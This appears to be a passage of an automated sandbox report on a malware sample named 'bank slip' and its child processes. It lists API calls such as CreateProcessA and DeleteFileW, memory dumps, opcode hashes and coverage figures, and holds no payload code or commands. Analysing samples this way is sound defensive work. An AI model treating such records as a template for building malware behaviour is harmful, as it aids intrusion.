                                                                      • Instruction ID: 8e49e2182563c12658377d3a94fd94c22c3b59dcb84d2c9073f64ae74fff66df
                                                                      • Opcode Fuzzy Hash: cdd924c9e89e0f42cc50db631eccf5439cb6248819bcf155c28c35d31e977d41
                                                                      • Instruction Fuzzy Hash: 032105B5D00209DFDB10DF9AD584ADEBBF4FB48310F14841AE918A3310C374A950CFA5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0259B9E1,00000800,00000000,00000000), ref: 0259BBF2
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2071572614.0000000002590000.00000040.00000800.00020000.00000000.sdmp, Offset: 02590000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2590000_bank slip.jbxd
                                                                      Similarity
                                                                      • API ID: LibraryLoad
                                                                      • String ID:
                                                                      • API String ID: 1029625771-0
                                                                      • Opcode ID: 069c02fb1af12a050661823c5a6200dab160cf78ab3e755329ddab49e0468756
                                                                      • Instruction ID: a90a1d323eaeac581d7cc754f8806e0c0783ec26a9b73385db8f8b0698366760
                                                                      • Opcode Fuzzy Hash: 069c02fb1af12a050661823c5a6200dab160cf78ab3e755329ddab49e0468756
                                                                      • Instruction Fuzzy Hash: 2D1100B6D003499FDB10CF9AD844A9EFBF9EB88314F10842AE429A7640C379A545CFA5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0259B9E1,00000800,00000000,00000000), ref: 0259BBF2
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2071572614.0000000002590000.00000040.00000800.00020000.00000000.sdmp, Offset: 02590000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2590000_bank slip.jbxd
                                                                      Similarity
                                                                      • API ID: LibraryLoad
                                                                      • String ID:
                                                                      • API String ID: 1029625771-0
                                                                      • Opcode ID: e45e4d08912f66071fac121dc3dec35cfca06f55c7e547edcf01e046d031aba4
                                                                      • Instruction ID: 13dab730903bf37954ce69e2e923460c40e06dc51b185199de08fadaa837f770
                                                                      • Opcode Fuzzy Hash: e45e4d08912f66071fac121dc3dec35cfca06f55c7e547edcf01e046d031aba4
                                                                      • Instruction Fuzzy Hash: 5111EFB6D003498FDB10CF9AD544ADEFBF5BB88324F14842EE829A7640C379A545CFA5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • PostMessageW.USER32(?,00000010,00000000,?), ref: 06A144AD
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2075096399.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_6a10000_bank slip.jbxd
                                                                      Similarity
                                                                      • API ID: MessagePost
                                                                      • String ID:
                                                                      • API String ID: 410705778-0
                                                                      • Opcode ID: b85f7696c3d063332074d98b1ceb5f0800147af102d8ab060b958af5c79ff203
                                                                      • Instruction ID: ff5feeea5787c9d83c68d584b181481971afad67973e9b2c1e3dba9eb250501a
                                                                      • Opcode Fuzzy Hash: b85f7696c3d063332074d98b1ceb5f0800147af102d8ab060b958af5c79ff203
                                                                      • Instruction Fuzzy Hash: 571103B58003499FDB10DF9AD889BDEBBF8EB48320F20845AE519B7240C375A944CFA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 0259B966
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2071572614.0000000002590000.00000040.00000800.00020000.00000000.sdmp, Offset: 02590000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2590000_bank slip.jbxd
                                                                      Similarity
                                                                      • API ID: HandleModule
                                                                      • String ID:
                                                                      • API String ID: 4139908857-0
                                                                      • Opcode ID: 4f50ee04f77a50d2f1a504abd6779b99d31b00894104f53a05c4bd59423addd1
                                                                      • Instruction ID: 55b3005cb6b18978420b8270122a549f25af839f22dde4bc0b9095b580c3c4b5
                                                                      • Opcode Fuzzy Hash: 4f50ee04f77a50d2f1a504abd6779b99d31b00894104f53a05c4bd59423addd1
                                                                      • Instruction Fuzzy Hash: 18110FB6C102498FDB10CF9AD444ADEFBF4AB88224F10845AD429B7210C375A545CFA5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • PostMessageW.USER32(?,00000010,00000000,?), ref: 06A144AD
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2075096399.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_6a10000_bank slip.jbxd
                                                                      Similarity
                                                                      • API ID: MessagePost
                                                                      • String ID:
                                                                      • API String ID: 410705778-0
                                                                      • Opcode ID: a8f3bf70e682368c2e87d4bc34fec44f470d49299e59766b809c0c2c2cdf51e9
                                                                      • Instruction ID: 0af836f9e9e555337e1cce092b4df7f22d93fad093da166d6d12810353347cc4
                                                                      • Opcode Fuzzy Hash: a8f3bf70e682368c2e87d4bc34fec44f470d49299e59766b809c0c2c2cdf51e9
                                                                      • Instruction Fuzzy Hash: AC11F2B58003499FDB10DF9AD849BDEFFF8EB48320F24845AE519A7240C375A984CFA5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2063826406.000000000080D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0080D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_80d000_bank slip.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 6191023e85df32fe36292b87a4b174bf7f53b04aa6d52d071425651486918f87
                                                                      • Instruction ID: 69bda0f6922470ad69d5693f484c6f741b01d75a219cb982522c79d30e9bd485
                                                                      • Opcode Fuzzy Hash: 6191023e85df32fe36292b87a4b174bf7f53b04aa6d52d071425651486918f87
                                                                      • Instruction Fuzzy Hash: FC2148B1500704DFDB00DF44DDC0B26BF65FB94324F24C569E9098B296C336E816C6A6
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2067207657.00000000009FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009FD000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9fd000_bank slip.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 64b3d9851e6017974e660423c904b96b02c7e4beac0a2a58bbc7134b28bc8b8f
                                                                      • Instruction ID: e4e612ddd1e1e954fa8e5dc9ec16d9b530767ac20580ab4729d077029cc404bc
                                                                      • Opcode Fuzzy Hash: 64b3d9851e6017974e660423c904b96b02c7e4beac0a2a58bbc7134b28bc8b8f
                                                                      • Instruction Fuzzy Hash: 3E21F571504248DFDB14DF14D5C4B26BB66EB84314F38C96DDA0A4B246CB3AD807CB61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2067207657.00000000009FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009FD000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9fd000_bank slip.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d80f18caa57ec7c23e8092c66e61002b31f7c1951ef46221ba089b40fb038034
                                                                      • Instruction ID: ea27154e21bb76a085d47a93dd81912e6fabfb7bf9edb3dc778b18c8b1100a2e
                                                                      • Opcode Fuzzy Hash: d80f18caa57ec7c23e8092c66e61002b31f7c1951ef46221ba089b40fb038034
                                                                      • Instruction Fuzzy Hash: 7B2129B1504208EFDB05DF14D5C0B36BBA6FB84314F34C96DDA094B255C33AD816CBA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2067207657.00000000009FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009FD000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9fd000_bank slip.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 09a3e73eb66ab20ed9b9b8e411dda0d4ec96d512644c1e1b494f94c871a43e52
                                                                      • Instruction ID: f3bb2db35c14d5c0363ce479c3debc747be75173abdc80d9f30587b2ab219b1f
                                                                      • Opcode Fuzzy Hash: 09a3e73eb66ab20ed9b9b8e411dda0d4ec96d512644c1e1b494f94c871a43e52
                                                                      • Instruction Fuzzy Hash: 43219F755093C48FCB02CF24D994715BF72EB46314F28C5EAD9498F6A7C33A980ACB62
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2063826406.000000000080D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0080D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_80d000_bank slip.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c71a23e6f2891b0ac880f649e89db06405e67f0af756f6891ce480dd6b8289f7
                                                                      • Instruction ID: f4ef10ef8a2e2edd498c25f4017fd3a96ad4c4e149f14d14da1be9204c7cbd87
                                                                      • Opcode Fuzzy Hash: c71a23e6f2891b0ac880f649e89db06405e67f0af756f6891ce480dd6b8289f7
                                                                      • Instruction Fuzzy Hash: 1A110372504740CFDB02CF44D9C4B16BF71FB94324F24C2A9D8094B656C33AE85ACBA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2067207657.00000000009FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009FD000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9fd000_bank slip.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5ecdbd2196c02b2d36a90ebf2b22d30fffd8b7da1097997a33617a95b9f44a3d
                                                                      • Instruction ID: fd4150a17dda434ad6de1dd3f1891a0f632db259bc4ccb88519c558d02bceee8
                                                                      • Opcode Fuzzy Hash: 5ecdbd2196c02b2d36a90ebf2b22d30fffd8b7da1097997a33617a95b9f44a3d
                                                                      • Instruction Fuzzy Hash: C411DD75904284DFDB02CF10D5C4B25FBB2FB84324F24C6AED9494B696C33AD81ACBA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2063826406.000000000080D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0080D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_80d000_bank slip.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 00f1b6725b5e9545d04c737fccf57e9565c2d506985314c25841b0de2d429915
                                                                      • Instruction ID: 06f0b087efcf4ca69e2354fc6283788954e619b0dbad35b9addad16d0c23b06e
                                                                      • Opcode Fuzzy Hash: 00f1b6725b5e9545d04c737fccf57e9565c2d506985314c25841b0de2d429915
                                                                      • Instruction Fuzzy Hash: D60126710053449AE7508EA9CDC4B27FFA8EF81324F28C91AED088A2C6C3399840CAB1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2063826406.000000000080D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0080D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_80d000_bank slip.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 00337754a9a171314542e8976623a0f96d524ef1b2af9ca55db0c22245292c17
                                                                      • Instruction ID: 7d1105394077bf274ec8871485bd17b87a244ba75bbe6467d5c4fec66108ad08
                                                                      • Opcode Fuzzy Hash: 00337754a9a171314542e8976623a0f96d524ef1b2af9ca55db0c22245292c17
                                                                      • Instruction Fuzzy Hash: 9DF06D72404344AEE7108E1ADD88B62FFA8EB91734F18C45AED088A2D6C3799844CAB1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2075061318.00000000068A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_68a0000_bank slip.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: TJhq$Tecq$pgq$xbfq
                                                                      • API String ID: 0-3743893911
                                                                      • Opcode ID: 9928fecb5adca0e979cbc67bd553caf068b2ece1a212cf2c1c27287210327fc7
                                                                      • Instruction ID: 59f67c301c82e5e269983573b8fedabcc65fe89b7a39e277480eee3297a49779
                                                                      • Opcode Fuzzy Hash: 9928fecb5adca0e979cbc67bd553caf068b2ece1a212cf2c1c27287210327fc7
                                                                      • Instruction Fuzzy Hash: 66B2A075E00628DFDB64CF69C984ADDBBB2BF89304F1581E9D509AB225DB319E81CF40
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2074216014.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_4ba0000_bank slip.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 09aa988843d681b25ba97ea45cf1e8b30ca7043189146b8f25ea30f21d8189be
                                                                      • Instruction ID: d6d62bea6f2a1a577bf256cf836c2c92dfc347bb652b0e243776b67691a41c49
                                                                      • Opcode Fuzzy Hash: 09aa988843d681b25ba97ea45cf1e8b30ca7043189146b8f25ea30f21d8189be
                                                                      • Instruction Fuzzy Hash: 1C129EB8C01746ABE710CF65E94C18D3AB1FBE5328B904219D3616A2E5DBBE194BCF44
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2075061318.00000000068A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_68a0000_bank slip.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 39372efafb06b24f86d8979883cb0137f593588802102fd81cb045a358a2f577
                                                                      • Instruction ID: 84846bc883b8041a47c707c7c29f0c4b29ef8b1fedf221028283b6179f328c65
                                                                      • Opcode Fuzzy Hash: 39372efafb06b24f86d8979883cb0137f593588802102fd81cb045a358a2f577
                                                                      • Instruction Fuzzy Hash: 4DD10C31D20B5ACACB01EB64D950A9DB3B1FF95300F20C79AE50977264EB706AD9CB91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2071572614.0000000002590000.00000040.00000800.00020000.00000000.sdmp, Offset: 02590000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2590000_bank slip.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 8b63149addf88eb91595f4a25579ccd1f6d8b23ee3485d9fed87d29f6bf89aa4
                                                                      • Instruction ID: 2f45c11fc2d166003a4c274648467c697a79a0787fe021b65f23db1cbb8016ae
                                                                      • Opcode Fuzzy Hash: 8b63149addf88eb91595f4a25579ccd1f6d8b23ee3485d9fed87d29f6bf89aa4
                                                                      • Instruction Fuzzy Hash: E6A15B32A10216CFCF05DFA4C84459EBBB2FFC9300B15856AE805AB265EB35ED46CF50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2074216014.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_4ba0000_bank slip.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ea99c03db26ccba008304b3b8dd542e3aa61a630c03f6e9a924f7cac0365f68a
                                                                      • Instruction ID: b6cb2a4cb2b6b2ffe6c435e1487f4189a88221abad14a07c0739a981f1ff4837
                                                                      • Opcode Fuzzy Hash: ea99c03db26ccba008304b3b8dd542e3aa61a630c03f6e9a924f7cac0365f68a
                                                                      • Instruction Fuzzy Hash: 9EC1E4B8C01746ABD710CF65E94818D7BB1FFE5328B604219D3616B2E5DBBA184BCF44
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2075061318.00000000068A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_68a0000_bank slip.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 597ec99cb6010c5a76f3ed531b38d603c03a77b1a6e9b4b184d165a3792b5251
                                                                      • Instruction ID: 852853683044281797ec9877b1dd6af15a189c6bbc5b409f9b82bb465a1763c7
                                                                      • Opcode Fuzzy Hash: 597ec99cb6010c5a76f3ed531b38d603c03a77b1a6e9b4b184d165a3792b5251
                                                                      • Instruction Fuzzy Hash: A151D274E052198FDB44DFAAD5809AEFBF2FF88300F24D126E819A7255D730A942CF91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2075061318.00000000068A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_68a0000_bank slip.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 73f66c315014ee156acb95114b5aaabb82b7a42e10fdf6b4480f137db20ba23c
                                                                      • Instruction ID: 8ed65e08258abfcd48f4fcdb4f13800afdc4891b74b1b6a1636b8f2ab51eccb8
                                                                      • Opcode Fuzzy Hash: 73f66c315014ee156acb95114b5aaabb82b7a42e10fdf6b4480f137db20ba23c
                                                                      • Instruction Fuzzy Hash: E85184B4E016188FEB68CF2AD95479DBAF3AFC8204F14C1EAD40DA7264DB710A95CF40
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2075061318.00000000068A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_68a0000_bank slip.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 46e02f39ec5a5673a5b654ad8f61a36382896fb7c6b2f03fb48d67b3fc0f04d6
                                                                      • Instruction ID: 84c2a38f15b703052d9f621e47c04b9fd8474e3eb66a9657e06ed356a9ee06c3
                                                                      • Opcode Fuzzy Hash: 46e02f39ec5a5673a5b654ad8f61a36382896fb7c6b2f03fb48d67b3fc0f04d6
                                                                      • Instruction Fuzzy Hash: F33147B1D016188BEB68CF6BDD4478EFAF7AFC8204F14C1AAD40CAA254EB7509958F51
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Execution Graph

                                                                      Execution Coverage:13.8%
                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                      Signature Coverage:0%
                                                                      Total number of Nodes:12
                                                                      Total number of Limit Nodes:2

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • DeleteFileW.KERNELBASE(00000000), ref: 012C73C0
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2089275349.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_12c0000_RegSvcs.jbxd
                                                                      Similarity
                                                                      • API ID: DeleteFile
                                                                      • String ID: u
                                                                      • API String ID: 4033686569-4067256894
                                                                      • Opcode ID: 366b76a074f9a3a8addb4d5c173792b42a9328506fbeee389bc2405dc9c1fecd
                                                                      • Instruction ID: 9539ef3a891afa15e9ffffce84c5f91a89cf6af84a78fb6991b461868c17863c
                                                                      • Opcode Fuzzy Hash: 366b76a074f9a3a8addb4d5c173792b42a9328506fbeee389bc2405dc9c1fecd
                                                                      • Instruction Fuzzy Hash: 742135B1C1065A9FCB14CF9AD445BEEFBF0BF48320F10826AD918A7240D378A944CFA5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2113306020.0000000006390000.00000040.00000800.00020000.00000000.sdmp, Offset: 06390000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_6390000_RegSvcs.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 56284fa46c89c456e2a716b1f0fea5dedc5f096a0be44c055cd1a420957371e8
                                                                      • Instruction ID: 6d0614fae29ecfec2f57043bac189ebe471fd48a240247f055a99cfb638e09c2
                                                                      • Opcode Fuzzy Hash: 56284fa46c89c456e2a716b1f0fea5dedc5f096a0be44c055cd1a420957371e8
                                                                      • Instruction Fuzzy Hash: A6412672E043598FCB10DF69D8046AEBFF5AF8A310F1585AAD404A7341EB74A845CBE1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • DeleteFileW.KERNELBASE(00000000), ref: 012C73C0
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2089275349.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_12c0000_RegSvcs.jbxd
                                                                      Similarity
                                                                      • API ID: DeleteFile
                                                                      • String ID:
                                                                      • API String ID: 4033686569-0
                                                                      • Opcode ID: 63de94153e15bfa01528f17c8ca7ce15ce568920ab5f5daf9d1fc38725015149
                                                                      • Instruction ID: c22c33e0a310a560fc3ec8c1440de45d07ac2656fb964d34ecc27e68fdf14ca2
                                                                      • Opcode Fuzzy Hash: 63de94153e15bfa01528f17c8ca7ce15ce568920ab5f5daf9d1fc38725015149
                                                                      • Instruction Fuzzy Hash: 341144B1C1061A9BCB14CF9AD445B9EFBF4FF48720F11822AD918A7240D338A944CFA5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,0639E51A), ref: 0639E607
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2113306020.0000000006390000.00000040.00000800.00020000.00000000.sdmp, Offset: 06390000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_6390000_RegSvcs.jbxd
                                                                      Similarity
                                                                      • API ID: GlobalMemoryStatus
                                                                      • String ID:
                                                                      • API String ID: 1890195054-0
                                                                      • Opcode ID: 6190796129e2b0b8f5d8a5c12bd0fbf5190cd35283f16bc997f4d0fd76e4aec5
                                                                      • Instruction ID: f837217ff774cb02bf3af2f0883bf6dcd3efbc05cc79a7e6c37b795140fffd18
                                                                      • Opcode Fuzzy Hash: 6190796129e2b0b8f5d8a5c12bd0fbf5190cd35283f16bc997f4d0fd76e4aec5
                                                                      • Instruction Fuzzy Hash: CD1103B1C006599BCB10DF9AC444B9EFBF4AF48310F11816AE918A7240D378A944CFE5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,0639E51A), ref: 0639E607
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2113306020.0000000006390000.00000040.00000800.00020000.00000000.sdmp, Offset: 06390000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_6390000_RegSvcs.jbxd
                                                                      Similarity
                                                                      • API ID: GlobalMemoryStatus
                                                                      • String ID:
                                                                      • API String ID: 1890195054-0
                                                                      • Opcode ID: ad28ec8215254bf8428e1eb8f92a88743ddb505516a137c0421a904cd30abe44
                                                                      • Instruction ID: 47031c59d19f6539e1912ff2b51bae6160a204735522e52668747acec87bc53f
                                                                      • Opcode Fuzzy Hash: ad28ec8215254bf8428e1eb8f92a88743ddb505516a137c0421a904cd30abe44
                                                                      • Instruction Fuzzy Hash: 5A1142B6C0021A9BCB00CF9AC544BDEFBF4AF48321F11816AD428B7240D378A944CFA5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Execution Graph

                                                                      Execution Coverage:8.9%
                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                      Signature Coverage:0%
                                                                      Total number of Nodes:67
                                                                      Total number of Limit Nodes:6

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • GetCurrentProcess.KERNEL32 ref: 0544DA16
                                                                      • GetCurrentThread.KERNEL32 ref: 0544DA53
                                                                      • GetCurrentProcess.KERNEL32 ref: 0544DA90
                                                                      • GetCurrentThreadId.KERNEL32 ref: 0544DAE9
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2128166700.0000000005440000.00000040.00000800.00020000.00000000.sdmp, Offset: 05440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_5440000_mKSjGvfmIulVB.jbxd
                                                                      Similarity
                                                                      • API ID: Current$ProcessThread
                                                                      • String ID:
                                                                      • API String ID: 2063062207-0
                                                                      • Opcode ID: 4c41354c0471248be94f08c0ae910563ffba70f7c24674e45477ce3ac4edc909
                                                                      • Instruction ID: 13cf8d1d9cec15f1787919fb958c2c0a30a606986dfd0b6294aedd43ed36a64c
                                                                      • Opcode Fuzzy Hash: 4c41354c0471248be94f08c0ae910563ffba70f7c24674e45477ce3ac4edc909
                                                                      • Instruction Fuzzy Hash: 695143B0D103098FDB14DFAAD548BEEBBF1BB88314F24845AE409A7390DB349984CF65
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 074BFE66
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2134776693.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_74b0000_mKSjGvfmIulVB.jbxd
                                                                      Similarity
                                                                      • API ID: CreateProcess
                                                                      • String ID:
                                                                      • API String ID: 963392458-0
                                                                      • Opcode ID: a319cf216dbf1e2f3adbc7f54410bef07d1f676eadd2d26a425049fe960f5dec
                                                                      • Instruction ID: 02b4e181f4b57bb81b264c2106b8368c294f5a80cdd64eee7a03f20c262b296a
                                                                      • Opcode Fuzzy Hash: a319cf216dbf1e2f3adbc7f54410bef07d1f676eadd2d26a425049fe960f5dec
                                                                      • Instruction Fuzzy Hash: C5913DB1D0025ACFDB20DFA8CC417DEBBB6BB49310F14856AD819A7250DB749989CFA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 0544B966
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2128166700.0000000005440000.00000040.00000800.00020000.00000000.sdmp, Offset: 05440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_5440000_mKSjGvfmIulVB.jbxd
                                                                      Similarity
                                                                      • API ID: HandleModule
                                                                      • String ID:
                                                                      • API String ID: 4139908857-0
                                                                      • Opcode ID: 03effb5e71bb46a0acc5d052d5694da019f4cc5d77857eb0a3de3718a8dac36d
                                                                      • Instruction ID: a2335b728c8d8b4ba0324c93b1031d450fd935ce3c0c0736b2d18ecff04864c9
                                                                      • Opcode Fuzzy Hash: 03effb5e71bb46a0acc5d052d5694da019f4cc5d77857eb0a3de3718a8dac36d
                                                                      • Instruction Fuzzy Hash: 3A8113B0A00B058FEB64DF6AD44579BBBF2FF88204F10896ED48697B50D774E8498F91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

